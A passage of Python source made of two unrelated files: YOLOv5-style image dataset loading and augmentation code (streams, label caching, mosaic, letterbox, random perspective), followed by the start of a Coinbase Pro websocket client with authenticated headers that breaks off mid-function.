assert ret_val, f'Camera Error {self.pipe}'
img_path = 'webcam.jpg'
print(f'webcam {self.count}: ', end='')
# Padded resize
img = letterbox(img0, self.img_size, stride=self.stride)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return img_path, img, img0, None
def __len__(self):
return 0
class LoadStreams: # multiple IP or RTSP cameras
def __init__(self, sources='streams.txt', img_size=640, stride=32):
self.mode = 'stream'
self.img_size = img_size
self.stride = stride
if os.path.isfile(sources):
with open(sources, 'r') as f:
sources = [x.strip() for x in f.read().strip().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs = [None] * n
self.sources = [clean_str(x) for x in sources] # clean source names for later
for i, s in enumerate(sources):
# Start the thread to read frames from the video stream
print(f'{i + 1}/{n}: {s}... ', end='')
cap = cv2.VideoCapture(eval(s) if s.isnumeric() else s)
assert cap.isOpened(), f'Failed to open {s}'
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = cap.get(cv2.CAP_PROP_FPS) % 100
_, self.imgs[i] = cap.read() # guarantee first frame
thread = Thread(target=self.update, args=([i, cap]), daemon=True)
print(f' success ({w}x{h} at {fps:.2f} FPS).')
thread.start()
print('') # newline
# check for common shapes
s = np.stack([letterbox(x, self.img_size, stride=self.stride)[0].shape for x in self.imgs], 0) # shapes
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
if not self.rect:
print('WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams.')
def update(self, index, cap):
# Read next stream frame in a daemon thread
n = 0
while cap.isOpened():
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n == 4: # read every 4th frame
success, im = cap.retrieve()
self.imgs[index] = im if success else self.imgs[index] * 0
n = 0
time.sleep(0.01) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
img0 = self.imgs.copy()
if cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img = [letterbox(x, self.img_size, auto=self.rect, stride=self.stride)[0] for x in img0]
# Stack
img = np.stack(img, 0)
# Convert
img = img[:, :, :, ::-1].transpose(0, 3, 1, 2) # BGR to RGB, to bsx3x416x416
img = np.ascontiguousarray(img)
return self.sources, img, img0, None
def __len__(self):
return 0 # 1E12 frames = 32 streams at 30 FPS for 30 years
def img2label_paths(img_paths):
# Define label paths as a function of image paths
sa, sb = os.sep + 'images' + os.sep, os.sep + 'labels' + os.sep # /images/, /labels/ substrings
return [x.replace(sa, sb, 1).replace('.' + x.split('.')[-1], '.txt') for x in img_paths]
class LoadImagesAndLabels(Dataset): # for training/testing
def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
cache_images=False, single_cls=False, stride=32, pad=0.0, prefix=''):
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = self.augment and not self.rect # load 4 images at a time into a mosaic (only during training)
self.mosaic_border = [-img_size // 2, -img_size // 2]
self.stride = stride
self.path = path
try:
f = [] # image files
for p in path if isinstance(path, list) else [path]:
p = Path(p) # os-agnostic
if p.is_dir(): # dir
f += glob.glob(str(p / '**' / '*.*'), recursive=True)
# f = list(p.rglob('**/*.*')) # pathlib
elif p.is_file(): # file
with open(p, 'r') as t:
t = t.read().strip().splitlines()
parent = str(p.parent) + os.sep
f += [x.replace('./', parent) if x.startswith('./') else x for x in t] # local to global path
# f += [p.parent / x.lstrip(os.sep) for x in t] # local to global path (pathlib)
else:
raise Exception(f'{prefix}{p} does not exist')
self.img_files = sorted([x.replace('/', os.sep) for x in f if x.split('.')[-1].lower() in img_formats])
# self.img_files = sorted([x for x in f if x.suffix[1:].lower() in img_formats]) # pathlib
assert self.img_files, f'{prefix}No images found'
except Exception as e:
raise Exception(f'{prefix}Error loading data from {path}: {e}\nSee {help_url}')
# Check cache
self.label_files = img2label_paths(self.img_files) # labels
cache_path = (p if p.is_file() else Path(self.label_files[0]).parent).with_suffix('.cache') # cached labels
if cache_path.is_file():
cache, exists = torch.load(cache_path), True # load
if cache['hash'] != get_hash(self.label_files + self.img_files) or 'version' not in cache: # changed
cache, exists = self.cache_labels(cache_path, prefix), False # re-cache
else:
cache, exists = self.cache_labels(cache_path, prefix), False # cache
# Display cache
nf, nm, ne, nc, n = cache.pop('results') # found, missing, empty, corrupted, total
if exists:
d = f"Scanning '{cache_path}' for images and labels... {nf} found, {nm} missing, {ne} empty, {nc} corrupted"
tqdm(None, desc=prefix + d, total=n, initial=n) # display cache results
assert nf > 0 or not augment, f'{prefix}No labels in {cache_path}. Can not train without labels. See {help_url}'
# Read cache
cache.pop('hash') # remove hash
cache.pop('version') # remove version
labels, shapes, self.segments = zip(*cache.values())
self.labels = list(labels)
self.shapes = np.array(shapes, dtype=np.float64)
self.img_files = list(cache.keys()) # update
self.label_files = img2label_paths(cache.keys()) # update
if single_cls:
for x in self.labels:
x[:, 0] = 0
n = len(shapes) # number of images
bi = np.floor(np.arange(n) / batch_size).astype(np.int) # batch index
nb = bi[-1] + 1 # number of batches
self.batch = bi # batch index of image
self.n = n
self.indices = range(n)
# Rectangular Training
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()
self.img_files = [self.img_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.labels = [self.labels[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride + pad).astype(np.int) * stride
# Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
self.imgs = [None] * n
if cache_images:
gb = 0 # Gigabytes of cached images
self.img_hw0, self.img_hw = [None] * n, [None] * n
results = ThreadPool(8).imap(lambda x: load_image(*x), zip(repeat(self), range(n))) # 8 threads
pbar = tqdm(enumerate(results), total=n)
for i, x in pbar:
self.imgs[i], self.img_hw0[i], self.img_hw[i] = x # img, hw_original, hw_resized = load_image(self, i)
gb += self.imgs[i].nbytes
pbar.desc = f'{prefix}Caching images ({gb / 1E9:.1f}GB)'
def cache_labels(self, path=Path('./labels.cache'), prefix=''):
# Cache dataset labels, check images and read shapes
x = {} # dict
nm, nf, ne, nc = 0, 0, 0, 0 # number missing, found, empty, duplicate
pbar = tqdm(zip(self.img_files, self.label_files), desc='Scanning images', total=len(self.img_files))
for i, (im_file, lb_file) in enumerate(pbar):
try:
# verify images
im = Image.open(im_file)
im.verify() # PIL verify
shape = exif_size(im) # image size
segments = [] # instance segments
assert (shape[0] > 9) & (shape[1] > 9), f'image size {shape} <10 pixels'
assert im.format.lower() in img_formats, f'invalid image format {im.format}'
# verify labels
if os.path.isfile(lb_file):
nf += 1 # label found
with open(lb_file, 'r') as f:
l = [x.split() for x in f.read().strip().splitlines()]
if any([len(x) > 8 for x in l]): # is segment
classes = np.array([x[0] for x in l], dtype=np.float32)
segments = [np.array(x[1:], dtype=np.float32).reshape(-1, 2) for x in l] # (cls, xy1...)
l = np.concatenate((classes.reshape(-1, 1), segments2boxes(segments)), 1) # (cls, xywh)
l = np.array(l, dtype=np.float32)
if len(l):
assert l.shape[1] == 5, 'labels require 5 columns each'
assert (l >= 0).all(), 'negative labels'
assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels'
assert np.unique(l, axis=0).shape[0] == l.shape[0], 'duplicate labels'
else:
ne += 1 # label empty
l = np.zeros((0, 5), dtype=np.float32)
else:
nm += 1 # label missing
l = np.zeros((0, 5), dtype=np.float32)
x[im_file] = [l, shape, segments]
except Exception as e:
nc += 1
print(f'{prefix}WARNING: Ignoring corrupted image and/or label {im_file}: {e}')
pbar.desc = f"{prefix}Scanning '{path.parent / path.stem}' for images and labels... " \
f"{nf} found, {nm} missing, {ne} empty, {nc} corrupted"
if nf == 0:
print(f'{prefix}WARNING: No labels found in {path}. See {help_url}')
x['hash'] = get_hash(self.label_files + self.img_files)
x['results'] = nf, nm, ne, nc, i + 1
x['version'] = 0.1 # cache version
torch.save(x, path) # save for next time
logging.info(f'{prefix}New cache created: {path}')
return x
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
index = self.indices[index] # linear, shuffled, or image_weights
hyp = self.hyp
mosaic = self.mosaic and random.random() < hyp['mosaic']
if mosaic:
# Load mosaic
img, labels = load_mosaic(self, index)
shapes = None
# MixUp https://arxiv.org/pdf/1710.09412.pdf
if random.random() < hyp['mixup']:
img2, labels2 = load_mosaic(self, random.randint(0, self.n - 1))
r = np.random.beta(8.0, 8.0) # mixup ratio, alpha=beta=8.0
img = (img * r + img2 * (1 - r)).astype(np.uint8)
labels = np.concatenate((labels, labels2), 0)
else:
# Load image
img, (h0, w0), (h, w) = load_image(self, index)
# Letterbox
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
labels = self.labels[index].copy()
if labels.size: # normalized xywh to pixel xyxy format
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], ratio[0] * w, ratio[1] * h, padw=pad[0], padh=pad[1])
if self.augment:
# Augment imagespace
if not mosaic:
img, labels = random_perspective(img, labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'],
perspective=hyp['perspective'])
# Augment colorspace
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
# Apply cutouts
# if random.random() < 0.9:
# labels = cutout(img, labels)
nL = len(labels) # number of labels
if nL:
labels[:, 1:5] = xyxy2xywh(labels[:, 1:5]) # convert xyxy to xywh
labels[:, [2, 4]] /= img.shape[0] # normalized height 0-1
labels[:, [1, 3]] /= img.shape[1] # normalized width 0-1
if self.augment:
# flip up-down
if random.random() < hyp['flipud']:
img = np.flipud(img)
if nL:
labels[:, 2] = 1 - labels[:, 2]
# flip left-right
if random.random() < hyp['fliplr']:
img = np.fliplr(img)
if nL:
labels[:, 1] = 1 - labels[:, 1]
labels_out = torch.zeros((nL, 6))
if nL:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.img_files[index], shapes
@staticmethod
def collate_fn(batch):
img, label, path, shapes = zip(*batch) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, shapes
@staticmethod
def collate_fn4(batch):
img, label, path, shapes = zip(*batch) # transposed
n = len(shapes) // 4
img4, label4, path4, shapes4 = [], [], path[:n], shapes[:n]
ho = torch.tensor([[0., 0, 0, 1, 0, 0]])
wo = torch.tensor([[0., 0, 1, 0, 0, 0]])
s = torch.tensor([[1, 1, .5, .5, .5, .5]]) # scale
for i in range(n): # zidane torch.zeros(16,3,720,1280) # BCHW
i *= 4
if random.random() < 0.5:
im = F.interpolate(img[i].unsqueeze(0).float(), scale_factor=2., mode='bilinear', align_corners=False)[
0].type(img[i].type())
l = label[i]
else:
im = torch.cat((torch.cat((img[i], img[i + 1]), 1), torch.cat((img[i + 2], img[i + 3]), 1)), 2)
l = torch.cat((label[i], label[i + 1] + ho, label[i + 2] + wo, label[i + 3] + ho + wo), 0) * s
img4.append(im)
label4.append(l)
for i, l in enumerate(label4):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img4, 0), torch.cat(label4, 0), path4, shapes4
# Ancillary functions --------------------------------------------------------------------------------------------------
def load_image(self, index):
# loads 1 image from dataset, returns img, original hw, resized hw
img = self.imgs[index]
if img is None: # not cached
path = self.img_files[index]
img = cv2.imread(path) # BGR
assert img is not None, 'Image Not Found ' + path
h0, w0 = img.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # resize image to img_size
if r != 1: # always resize down, only resize up if training with augmentation
interp = cv2.INTER_AREA if r < 1 and not self.augment else cv2.INTER_LINEAR
img = cv2.resize(img, (int(w0 * r), int(h0 * r)), interpolation=interp)
return img, (h0, w0), img.shape[:2] # img, hw_original, hw_resized
else:
return self.imgs[index], self.img_hw0[index], self.img_hw[index] # img, hw_original, hw_resized
def augment_hsv(img, hgain=0.5, sgain=0.5, vgain=0.5):
r = np.random.uniform(-1, 1, 3) * [hgain, sgain, vgain] + 1 # random gains
hue, sat, val = cv2.split(cv2.cvtColor(img, cv2.COLOR_BGR2HSV))
dtype = img.dtype # uint8
x = np.arange(0, 256, dtype=np.int16)
lut_hue = ((x * r[0]) % 180).astype(dtype)
lut_sat = np.clip(x * r[1], 0, 255).astype(dtype)
lut_val = np.clip(x * r[2], 0, 255).astype(dtype)
img_hsv = cv2.merge((cv2.LUT(hue, lut_hue), cv2.LUT(sat, lut_sat), cv2.LUT(val, lut_val))).astype(dtype)
cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img) # no return needed
def hist_equalize(img, clahe=True, bgr=False):
# Equalize histogram on BGR image 'img' with img.shape(n,m,3) and range 0-255
yuv = cv2.cvtColor(img, cv2.COLOR_BGR2YUV if bgr else cv2.COLOR_RGB2YUV)
if clahe:
c = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8, 8))
yuv[:, :, 0] = c.apply(yuv[:, :, 0])
else:
yuv[:, :, 0] = cv2.equalizeHist(yuv[:, :, 0]) # equalize Y channel histogram
return cv2.cvtColor(yuv, cv2.COLOR_YUV2BGR if bgr else cv2.COLOR_YUV2RGB) # convert YUV image to RGB
def load_mosaic(self, index):
# loads images in a 4-mosaic
labels4, segments4 = [], []
s = self.img_size
yc, xc = [int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border] # mosaic center x, y
indices = [index] + [self.indices[random.randint(0, self.n - 1)] for _ in range(3)] # 3 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img4
if i == 0: # top left
img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, w, min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Labels
labels, segments = self.labels[index].copy(), self.segments[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padw, padh) # normalized xywh to pixel xyxy format
segments = [xyn2xy(x, w, h, padw, padh) for x in segments]
labels4.append(labels)
segments4.extend(segments)
# Concat/clip labels
labels4 = np.concatenate(labels4, 0)
for x in (labels4[:, 1:], *segments4):
np.clip(x, 0, 2 * s, out=x) # clip when using random_perspective()
# img4, labels4 = replicate(img4, labels4) # replicate
# Augment
img4, labels4 = random_perspective(img4, labels4, segments4,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img4, labels4
def load_mosaic9(self, index):
# loads images in a 9-mosaic
labels9, segments9 = [], []
s = self.img_size
indices = [index] + [self.indices[random.randint(0, self.n - 1)] for _ in range(8)] # 8 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img9
if i == 0: # center
img9 = np.full((s * 3, s * 3, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
h0, w0 = h, w
c = s, s, s + w, s + h # xmin, ymin, xmax, ymax (base) coordinates
elif i == 1: # top
c = s, s - h, s + w, s
elif i == 2: # top right
c = s + wp, s - h, s + wp + w, s
elif i == 3: # right
c = s + w0, s, s + w0 + w, s + h
elif i == 4: # bottom right
c = s + w0, s + hp, s + w0 + w, s + hp + h
elif i == 5: # bottom
c = s + w0 - w, s + h0, s + w0, s + h0 + h
elif i == 6: # bottom left
c = s + w0 - wp - w, s + h0, s + w0 - wp, s + h0 + h
elif i == 7: # left
c = s - w, s + h0 - h, s, s + h0
elif i == 8: # top left
c = s - w, s + h0 - hp - h, s, s + h0 - hp
padx, pady = c[:2]
x1, y1, x2, y2 = [max(x, 0) for x in c] # allocate coords
# Labels
labels, segments = self.labels[index].copy(), self.segments[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padx, pady) # normalized xywh to pixel xyxy format
segments = [xyn2xy(x, w, h, padx, pady) for x in segments]
labels9.append(labels)
segments9.extend(segments)
# Image
img9[y1:y2, x1:x2] = img[y1 - pady:, x1 - padx:] # img9[ymin:ymax, xmin:xmax]
hp, wp = h, w # height, width previous
# Offset
yc, xc = [int(random.uniform(0, s)) for _ in self.mosaic_border] # mosaic center x, y
img9 = img9[yc:yc + 2 * s, xc:xc + 2 * s]
# Concat/clip labels
labels9 = np.concatenate(labels9, 0)
labels9[:, [1, 3]] -= xc
labels9[:, [2, 4]] -= yc
c = np.array([xc, yc]) # centers
segments9 = [x - c for x in segments9]
for x in (labels9[:, 1:], *segments9):
np.clip(x, 0, 2 * s, out=x) # clip when using random_perspective()
# img9, labels9 = replicate(img9, labels9) # replicate
# Augment
img9, labels9 = random_perspective(img9, labels9, segments9,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img9, labels9
def replicate(img, labels):
# Replicate labels
h, w = img.shape[:2]
boxes = labels[:, 1:].astype(int)
x1, y1, x2, y2 = boxes.T
s = ((x2 - x1) + (y2 - y1)) / 2 # side length (pixels)
for i in s.argsort()[:round(s.size * 0.5)]: # smallest indices
x1b, y1b, x2b, y2b = boxes[i]
bh, bw = y2b - y1b, x2b - x1b
yc, xc = int(random.uniform(0, h - bh)), int(random.uniform(0, w - bw)) # offset x, y
x1a, y1a, x2a, y2a = [xc, yc, xc + bw, yc + bh]
img[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
labels = np.append(labels, [[labels[i, 0], x1a, y1a, x2a, y2a]], axis=0)
return img, labels
def letterbox(img, new_shape=(640, 640), color=(114, 114, 114), auto=True, scaleFill=False, scaleup=True, stride=32):
# Resize and pad image while meeting stride-multiple constraints
shape = img.shape[:2] # current shape [height, width]
if isinstance(new_shape, int):
new_shape = (new_shape, new_shape)
# Scale ratio (new / old)
r = min(new_shape[0] / shape[0], new_shape[1] / shape[1])
if not scaleup: # only scale down, do not scale up (for better test mAP)
r = min(r, 1.0)
# Compute padding
ratio = r, r # width, height ratios
new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))
dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1] # wh padding
if auto: # minimum rectangle
dw, dh = np.mod(dw, stride), np.mod(dh, stride) # wh padding
elif scaleFill: # stretch
dw, dh = 0.0, 0.0
new_unpad = (new_shape[1], new_shape[0])
ratio = new_shape[1] / shape[1], new_shape[0] / shape[0] # width, height ratios
dw /= 2 # divide padding into 2 sides
dh /= 2
if shape[::-1] != new_unpad: # resize
img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)
top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border
return img, ratio, (dw, dh)
def random_perspective(img, targets=(), segments=(), degrees=10, translate=.1, scale=.1, shear=10, perspective=0.0,
border=(0, 0)):
# torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10))
# targets = [cls, xyxy]
height = img.shape[0] + border[0] * 2 # shape(h,w,c)
width = img.shape[1] + border[1] * 2
# Center
C = np.eye(3)
C[0, 2] = -img.shape[1] / 2 # x translation (pixels)
C[1, 2] = -img.shape[0] / 2 # y translation (pixels)
# Perspective
P = np.eye(3)
P[2, 0] = random.uniform(-perspective, perspective) # x perspective (about y)
P[2, 1] = random.uniform(-perspective, perspective) # y perspective (about x)
# Rotation and Scale
R = np.eye(3)
a = random.uniform(-degrees, degrees)
# a += random.choice([-180, -90, 0, 90]) # add 90deg rotations to small rotations
s = random.uniform(1 - scale, 1 + scale)
# s = 2 ** random.uniform(-scale, scale)
R[:2] = cv2.getRotationMatrix2D(angle=a, center=(0, 0), scale=s)
# Shear
S = np.eye(3)
S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # x shear (deg)
S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # y shear (deg)
# Translation
T = np.eye(3)
T[0, 2] = random.uniform(0.5 - translate, 0.5 + translate) * width # x translation (pixels)
T[1, 2] = random.uniform(0.5 - translate, 0.5 + translate) * height # y translation (pixels)
# Combined rotation matrix
M = T @ S @ R @ P @ C # order of operations (right to left) is IMPORTANT
if (border[0] != 0) or (border[1] != 0) or (M != np.eye(3)).any(): # image changed
if perspective:
img = cv2.warpPerspective(img, M, dsize=(width, height), borderValue=(114, 114, 114))
else: # affine
img = cv2.warpAffine(img, M[:2], dsize=(width, height), borderValue=(114, 114, 114))
# Visualize
# import matplotlib.pyplot as plt
# ax = plt.subplots(1, 2, figsize=(12, 6))[1].ravel()
# ax[0].imshow(img[:, :, ::-1]) # base
# ax[1].imshow(img2[:, :, ::-1]) # warped
# Transform label coordinates
n = len(targets)
if n:
use_segments = any(x.any() for x in segments)
new = np.zeros((n, 4))
if use_segments: # warp segments
segments = resample_segments(segments) # upsample
for i, segment in enumerate(segments):
xy = np.ones((len(segment), 3))
xy[:, :2] = segment
xy = xy @ M.T # transform
xy = xy[:, :2] / xy[:, 2:3] if perspective else xy[:, :2] # perspective rescale or affine
# clip
new[i] = segment2box(xy, width, height)
else: # warp boxes
xy = np.ones((n * 4, 3))
xy[:, :2] = targets[:, [1, 2, 3, 4, 1, 4, 3, 2]].reshape(n * 4, 2) # x1y1, x2y2, x1y2, x2y1
xy = xy @ M.T # transform
xy = (xy[:, :2] / xy[:, 2:3] if perspective else xy[:, :2]).reshape(n, 8) # perspective rescale or affine
# create new boxes
x = xy[:, [0, 2, 4, 6]]
y = xy[:, [1, 3, 5, 7]]
new = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T
# clip
new[:, [0, 2]] = new[:, [0, 2]].clip(0, width)
new[:, [1, 3]] = new[:, [1, 3]].clip(0, height)
# filter candidates
i = box_candidates(box1=targets[:, 1:5].T * s, box2=new.T, area_thr=0.01 if use_segments else 0.10)
targets = targets[i]
targets[:, 1:5] = new[i]
return img, targets
def box_candidates(box1, box2, wh_thr=2, ar_thr=20, area_thr=0.1, eps=1e-16): # box1(4,n), box2(4,n)
# Compute candidate boxes: box1 before augment, box2 after augment, wh_thr (pixels), aspect_ratio_thr, area_ratio
w1, h1 = box1[2] - box1[0], box1[3] - box1[1]
w2, h2 = box2[2] - box2[0], box2[3] - box2[1]
ar = np.maximum(w2 / (h2 + eps), h2 / (w2 + eps)) # aspect ratio
return (w2 > wh_thr) & (h2 > wh_thr) & (w2 * h2 / (w1 * h1 + eps) > area_thr) & (ar < ar_thr) # candidates
def cutout(image, labels):
# Applies image cutout augmentation https://arxiv.org/abs/1708.04552
h, w = image.shape[:2]
def bbox_ioa(box1, box2):
# Returns the intersection over box2 area given box1, box2. box1 is 4, box2 is nx4. boxes are x1y1x2y2
box2 = box2.transpose()
# Get the coordinates of bounding boxes
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
# Intersection area
inter_area = (np.minimum(b1_x2, b2_x2) - np.maximum(b1_x1, b2_x1)).clip(0) * \
(np.minimum(b1_y2, b2_y2) - np.maximum(b1_y1, b2_y1)).clip(0)
# box2 area
box2_area = (b2_x2 - b2_x1) * (b2_y2 - b2_y1) + 1e-16
# Intersection over box2 area
return inter_area / box2_area
# create random masks
scales = [0.5] * 1 + [0.25] * 2 + [0.125] * 4 + [0.0625] * 8 + [0.03125] * 16 # image size fraction
for s in scales:
mask_h = random.randint(1, int(h * s))
mask_w = random.randint(1, int(w * s))
# box
xmin = max(0, random.randint(0, w) - mask_w // 2)
ymin = max(0, random.randint(0, h) - mask_h // 2)
xmax = min(w, xmin + mask_w)
ymax = min(h, ymin + mask_h)
# apply random color mask
image[ymin:ymax, xmin:xmax] = [random.randint(64, 191) for _ in range(3)]
# return unobscured labels
if len(labels) and s > 0.03:
box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32)
ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area
labels = labels[ioa < 0.60] # remove >60% obscured labels
return labels
def create_folder(path='./new'):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
def flatten_recursive(path='../coco128'):
# Flatten a recursive directory by bringing all files to top level
new_path = Path(path + '_flat')
create_folder(new_path)
for file in tqdm(glob.glob(str(Path(path)) + '/**/*.*', recursive=True)):
shutil.copyfile(file, new_path / Path(file).name)
def extract_boxes(path='../coco128/'): # from utils.datasets import *; extract_boxes('../coco128')
# Convert detection dataset into classification dataset, with one directory per class
path = Path(path) # images dir
shutil.rmtree(path / 'classifier') if (path / 'classifier').is_dir() else None # remove existing
files = list(path.rglob('*.*'))
n = len(files) # number of files
for im_file in tqdm(files, total=n):
if im_file.suffix[1:] in img_formats:
# image
im = cv2.imread(str(im_file))[..., ::-1] # BGR to RGB
h, w = im.shape[:2]
# labels
lb_file = Path(img2label_paths([str(im_file)])[0])
if Path(lb_file).exists():
with open(lb_file, 'r') as f:
lb = np.array([x.split() for x in f.read().strip().splitlines()], dtype=np.float32) # labels
for j, x in enumerate(lb):
c = int(x[0]) # class
f = (path / 'classifier') / f'{c}' / f'{path.stem}_{im_file.stem}_{j}.jpg' # new filename
if not f.parent.is_dir():
f.parent.mkdir(parents=True)
b = x[1:] * [w, h, w, h] # box
# b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.2 + 3 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(np.int)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(str(f), im[b[1]:b[3], b[0]:b[2]]), f'box failure in {f}'
def autosplit(path='../coco128', weights=(0.9, 0.1, 0.0)): # from utils.datasets import *; autosplit('../coco128')
""" Autosplit a dataset into train/val/test splits and save path/autosplit_*.txt files
# Arguments
path: Path to images directory
weights: Train, val, test weights (list)
"""
path = Path(path) # images dir
files = list(path.rglob('*.*'))
n = len(files) # number of files
indices = random.choices([0, 1, 2], weights=weights, k=n) # assign each image to a split
txt = ['autosplit_train.txt', 'autosplit_val.txt', 'autosplit_test.txt'] # 3 txt files
[(path / x).unlink() for x in txt if (path / x).exists()] # remove existing
for i, img in tqdm(zip(indices, files), total=n):
if img.suffix[1:] in img_formats:
with open(path / txt[i], 'a') as f:
f.write(str(img) + '\n') # add image to txt file
|
websocket.py
|
import json
import pymongo
import threading
import time
import websocket
import cbpro.auth
import cbpro.check
import cbpro.utils
def get_default_message() -> dict:
return {
'type': 'subscribe',
'product_ids': ['BTC-USD'],
'channels': ['ticker']
}
def get_message(value: dict = None) -> dict:
if value is None:
value = get_default_message()
cbpro.check.websocket_params(value)
return value
class WebsocketHeader(object):
def __init__(self,
key: str,
secret: str,
passphrase: str) -> None:
self.token = cbpro.auth.Token(key, secret, passphrase)
def __call__(self) -> dict:
timestamp = cbpro.auth.get_timestamp()
message = f'{timestamp}GET/users/self/verify'
b64signature = cbpro.auth.get_b64signature(message, self.token)
return {
'signature': b64signature,
'key': self.token.key,
'passphrase': self.token.passphrase,
'timestamp': timestamp
}
class WebsocketStream(object):
def __init__(self,
header: WebsocketHeader = None,
timeout: int = None,
traceable: bool = False) -> None:
self.header = header
self.timeout = 30 if timeout is None else timeout
self.traceable = traceable
self.url = 'wss://ws-feed.pro.coinbase.com'
self.connection = None
@property
def connected(self):
if self.connection and self.connection.connected:
return True
return False
def connect(self) -> None:
header = None if self.header is None else self.header()
websocket.enableTrace(self.traceable)
self.connection = websocket.create_connection(
url=self.url, header=header
)
def send(self, params: dict) -> None:
if self.connected:
payload = json.dumps(params)
